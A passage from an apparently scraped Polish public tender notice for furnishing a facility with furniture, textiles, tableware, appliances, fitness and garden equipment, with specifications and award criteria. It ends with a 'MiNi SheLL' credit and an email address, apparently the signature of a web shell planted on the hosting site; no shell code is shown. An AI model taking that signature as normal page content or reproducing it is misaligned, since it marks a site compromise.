schowku. Łącznie 32 schowki zamykane na klucz w 8 zamawianych szafach.•	Ilość sztuk – 8VII.	sofa 3- osobowa •	metalowe okrągłe nóżki umożliwiają poziomowanie mebla, siedziska i oparcia pokryte wytrzymałą tkaniną, o bardzo dużej odporności na plamy i zabrudzenia, •	wymiary: wys. siedziska 41 cm , gł. siedziska 52 cm, wym. 145 x 70 x 80 cm, •	kolor granatowy•	Ilość sztuk – 1VIII.	niski stół kawowy •	metalowa konstrukcja w kolorze aluminium, nogi wyposażone w stopkę umożliwiającą regulację wysokości. Blat stołu wykonany z płyty laminowanej o gr. 25 mm wykończonej obrzeżem o gr. 2 mm. •	Wymiary: śr. 80 cm, wys. 50 cm•	Ilość sztuk – 1IX.	biurko z szafką i szufladą •	wykonane z białej płyty laminowanej o gr. 18 mm, wykończone obrzeżem o gr. 2 mm. Wyposażone w szafkę i 1 szufladę zamykaną na zamek, •	wymiary: 120 x 60 x 76 cm•	Ilość sztuk – 1X.	krzesło obrotowe •	wykonane z tworzywa łatwo zmywalnego, kolor niebieski, siedzisko i oparcie połączone w jedną całość, odporne na zabrudzenia i wilgoć, stelaż krzesła wyposażony w kółka i mechanizm regulacji wysokości, •	wymiary: wys. siedziska od 43 do 56 cm•	Ilość sztuk – 1XI.	krzesło obrotowe biurowe •	wyposażone w wysokie, ergonomicznie wyprofilowane oparcie, regulowana wysokość, krzesło na kółkach, materiał: 100% włókno syntetyczne, kolor szaro-czarny•	wymiary: śr. 63 cm, wym. siedziska 50 x 48 cm, wys. siedziska 51-57 cm•	Ilość sztuk – 1XII.	szafa wysoka dwudrzwiowa •	szafa wykonana z płyty laminowanej o gr. 18 mm., wyposażona w 4 półki i zamek z kluczem, wymiary: 76 x 40 x 185 cm, •	kolor klon•	Ilość sztuk – 2XIII.	biurko do pokoju terapeutycznego •	wykonane z białej płyty laminowanej o gr. 18 mm, tonacja klon z zielonymi elementami, wyposażone w szafkę i 1 szufladę zamykaną na zamek, •	wymiary: 120 x 60 x 76 cm•	Ilość sztuk – 1XIV.	krzesło •	tapicera : materiałowa , kolor zielony •	rodzaj nóg: metalowe•	kolor stelaża: srebrny•	wymiary: szer. 45cm, wys. 83,5cm, •	Ilość sztuk – 2XV.	tapczan 1-osobowy •	1 szt., pojemnik otwierany, boki i pojemnik wykonane z płyty laminowanej, tonacja buku, materac pokryty granatową mikrofazą, •	wymiary: długość: 199 x szerokość: 80 x wysokość 60cm.•	Ilość sztuk – 1<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 39100000-3<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-25<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Część II Wyposażenie - tekstylia</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część II Wyposażenie - tekstyliaI.	firana •	skład tkaniny: 100% poliester, zapewnia dopływ światła,•	wysokość 160 cm, •	długość 25m•	kolor białyII.	obrus •	skład tkaniny: poliester, prostokątny, •	dł. 180 cm, szer.130 cm,•	kolor szary •	Ilość sztuk – 4<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 39200000-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-25<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Część III Wyposażenie - naczynia</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część III Wyposażenie - naczyniaI.	komplet obiadowy (18 elementów) •	W zestaw kompletu wchodzi : 6 talerzy płytkich (25,5cm), 6 talerzy głębokich (22,5 cm), 6 talerzy deserowych (20,5cm),•	kolor biały, •	porcelana polska, •	przystosowana do mycia w zmywarce i użytkowania w kuchence mikrofalowej•	Ilość kompletów – 5II.	komplet sztućców (24 elementy) •	w skład zestawu wchodzi : nóż - 6 szt.( z ząbkami), widelec- 6szt. (szerokie rozstawienie szpikulca) łyżka - 6 szt., łyżeczka - 6 szt., •	stal nierdzewna,•	przystosowany do mycia w zmywarce •	Ilość kompletów – 2III. kubek przezroczysty •	poj. 250 ml, •	wykonany ze szkła hartowanego, z uchem do trzymania, Kubek przeznaczony do podawania napojów zimnych oraz gorących, •	przystosowany do mycia w zmywarce•	Ilość sztuk – 30<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 39200000-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-25<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Część IV Wyposażenie pozostałe</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część IV Wyposażenie pozostałeI.	suszarka sufitowa •	posiada rurki powlekane polietylenem, przeznaczona do korzystania wewnątrz, •	do zamontowania pod sufitem na wys. 10 cm, •	szer. suszarki 150 cm, •	6-cio prętowa,•	Ilość sztuk – 1II.	karnisz pojedynczy •	wykonany ze stali, kolor srebrny, •	wymiary: dł. 240 cm, średnica 16 mm, •	1 drążek, 2 wsporniki, 2 końcówki, 24 kółka z żabką, montowany do ścian•	Ilość sztuk – 6III. deska do prasowania z przyłączem elektrycznym•	blat wykonany z siatki metalowej, podstawa na żelazko, •	4 stopniowa regulacja wysokości(74-90 cm), •	Wymiary: dł. 120cm, szer. 38 cm•	Ilość sztuk – 1IV.	Bateria kuchenna •	Rodzaj stojąca•	Typ baterii jednodźwigniowa•	Wykonanie korpusu stal szlachetna•	Barwa chrom•	Wysokość korpusu min. 158 mm•	Wysokość wylewki min. 137 mm•	Zasięg wylewki min. 219 mm•	Otwór montażowy 35 mm•	Wyposażenie wężyki podłączeniowe<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 39200000-4, 39700000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-25<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dosatwy</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Część V- sprzęt do ćwiczeń indywidualnych </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I.	bieżnia •	komputer: ekran 5” LCD programy treningowe; Funkcje: prędkość, czas, dystans, kalorie, puls, nachylenie bieżni, tętno; Silnik o mocy 2.5 KM, prędkość: 1-18 km/h; Powierzchnia pasa bieżni: 140 x 50 cm, grubość pasa: 1,4 mm; Nachylenie bieżni: 16 poziomów, regulowane elektronicznie; System łatwego składania bieżni; Klawisze szybkiego dostępu zmiany prędkości oraz nachylenia; klucz bezpieczeństwa; Kółka transportowe; Wymiary bieżni: 185 x 87 x 139 cm, po złożeniu: 117 x 87 x 157 cm; Waga produktu: 90 kg, waga w opakowaniu: 98 kg ; Maksymalna waga użytkownika: 135 kg; •	Ilość sztuk – 1II.	rowerek poziomy wyświetlacz negatywowy,; Poziomy oporu przystosowane dla początkujących i zaawansowanych użytkowników; Programy treningowe, Koło zamachowe: 9 kg; Typ ramy: rama pozioma; Siodełko: regulowane, z wygodnym, wyprofilowanym wysokim oparciem dla odcinka lędźwiowego; Pedały: szerokie, ergonomiczne, z regulowanymi paskami bezpieczeństwa; Pomiar pulsu: poprzez sensory umieszczone na kierownicy lub bezprzewodowo (wymagany dodatkowy pas piersiowy do pomiaru bezprzewodowego); Kółka transportowe (z przodu sprzętu); Nawiew/wentylator,(regulowany automatycznie lub ręcznie); Maksymalna waga użytkownika: 125 kg; Wymiary sprzętu: 132 x 57 x 150 cm•	Ilość sztuk – 1<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 37440000-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-25<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Część VI – sprzęt RTV i AGD </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część VI – sprzęt RTV i AGD I.	lodówka •	chłodziarka :217l, zamrażarka: 98l, bezszronowa, •	wymiary: wys.185cm, szer.59,5 cm, gł. 66.8cm; •	kolor: metaliczny grafit,•	położenie zamrażalki: na dole; •	funkcje dodatkowe: Wyświetlacz elektroniczny, Oświetlenie LED,; Klasa energetyczna A+++; szklane półki; •	Ilość sztuk – 1II.	telewizor •	ekran 65 cali; funkcje HDR, Smart, Wi-Fi, DLNA, USB - multimedia, USB - nagrywanie, Ambilight, HDMI x3, USB x2;Tuner DVB-T (MPEG-4), DVB-T2, DVB-T2-HD, DVB-S, DVB-S2, DVB-C, analogowy; procesor 4-rdzeniowy, USB - zdjęcia, muzyka, film, EasyLink, Digital EPG, PVR - nagrywanie USB, TimeShift, możliwość aktualizacji oprogramowania, możliwość sterowania za pomocą smartfona i tabletu, tryb ECO; możliwość montażu na ścianie; Wymiary bez podstawy: szer. x wys.x gł. - 146,2 x 85,2 x 7,1 cm •	Ilość sztuk – 1III.	wieża •	odtwarzacz płyt: CD, CD-RW, CD-R, MP3,•	moc:100 W, typ radia:FM, Cyfrowe; •	Ilość sztuk – 1IV.	czajnik bezprzewodowy •	pojemność:2.5l, moc grzałki: 2200W, element grzejny: grzałka spiralna, wykonanie: tworzywo sztuczne, obrotowa podstawa; Zabezpieczenie przed przegrzaniem, Automatyczne wyłączenie po osiągnięciu ustawionej temperatury; Czajnik posiada obrotową podstawę, dwustronny wskaźnik poziomu wody, podwójny system bezpieczeństw oraz zdejmowany i zmywalny filtr zanieczyszczeń i kamienia wodnego. Wyposażony jest również w dno grzewcze ze stali nierdzewnej ze zakrytą spiralą grzewczą i wskaźnik świetlny pracy. Ergonomiczny kształt uchwytu i wieko wyposażone w zamek bezpieczeństwa ułatwia korzystanie z urządzenia;•	Ilość sztuk – 2V.	żelazko •	stopa ceramiczna, moc:3000W, wytwarzanie pary, automatyczne wyłączenie; Funkcje dodatkowe: Auto off, Lampka kontrolna, Prasowanie na sucho i mokro, Prasowanie w pionie, Płynna regulacja temperatury; •	Ilość sztuk – 1VI.	kuchnia elektryczna •	rodzaj piekarnika i płyty grzewczej: elektryczny; rożen, termobieg, wymiary: •	wymiary: szer 60 cm; głębokość: 60cm, wysokość: 85cm; •	wnętrze piekarnika: wkłady katalityczne; wyposażenie dodatkowe: 1 półka siatkowa, widelec do rożna, 1 półka blaszana, ramka do zaczepiania rożna; •	napięcie: 230V•	Ilość sztuk – 1VII.	pralko-suszarka •	wielkość załadunku - pranie: 8kg, wielkość załadunku - suszenie: 5kg, •	wymiary: gł. 47cm, szer. 60cm, wys.85cm; •	kolor biały, blokada przedwczesnego otwarcia drzwi; •	automatyczny dobór wody do wielkości załadunku; programy: bawełna, delikatny, program szybki 30 minut, szybki 14 minut, szybki 44 minuty; •	Ilość sztuk – 1VIII.	wyparzarka do naczyń •	z pompą spustową, przeznaczona do mycia kubków, filiżanek, szkła, sztućców, talerzyków i talerzy; sterowanie manualne; dozownik nabłyszczacza; zużycie wody na 1 cykl mycia: 2,3 l; temperatura wody myjącej/płuczącej: +55°C/+85°C,•	wymiary: dł. 50 cm, szer. 50 cm,•	dostosowana do wymogów sanepidu;•	napięcie: 230V•	Ilość sztuk – 1IX.	okap kuchenny •	oświetlenie halogenowe, pochłaniacz, wyciąg,• wymiary: szer 60 cm, wys. max 13,5 cm, gł.50 cm; •	maksymalna wydajność wyciągu (norma EN-61591) (w m³/h): 203; natężenie hałasu przy maksymalnej prędkości wyciągu (w dB): 66; ilość silników 1; •	Ilość sztuk – 1<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, 39700000-9, 32300000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-25<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>Część VII – wyposażenie ogrodu</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I.	stół ogrodowy •	materiał blatu stołu: plastik, materiał konstrukcji stołu: plastik; •	składany, owalny,•	wymiar: dł: 135 cm, szer: 80 cm, •	kolor szary•	Ilość sztuk – 4II.	krzesło ogrodowe •	materiał wykonania: plastik, dopuszczalne obciążenie min. 110 kg, •	wysokość 79 cm x szerokość 56 cm x głębokość 58 cm, •	podłokietniki, •	kolor szary•	Ilość sztuk – 30III. parasol ogrodowy •	poszycie z wodoodpornego poliestru, stelaż z aluminium proszkowanego, z możliwością zginania, z korbką i wentylacją, z funkcją przechyłu, •	wymiary: średnica 300 cm, wysokość 248 cm,•	kolor szary•	Ilość sztuk – 4IV.	podstawa parasola •	materiał: plastik, •	wymiary: szer. 44cm, dł. 40 cm, wys.12 cm, •	poj. 12l, •	kolor szary antracyt,•	dopasowana do średnicy drążka parasola•	Ilość sztuk – 4<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39000000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-11-25<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">30,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">gwarancja</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com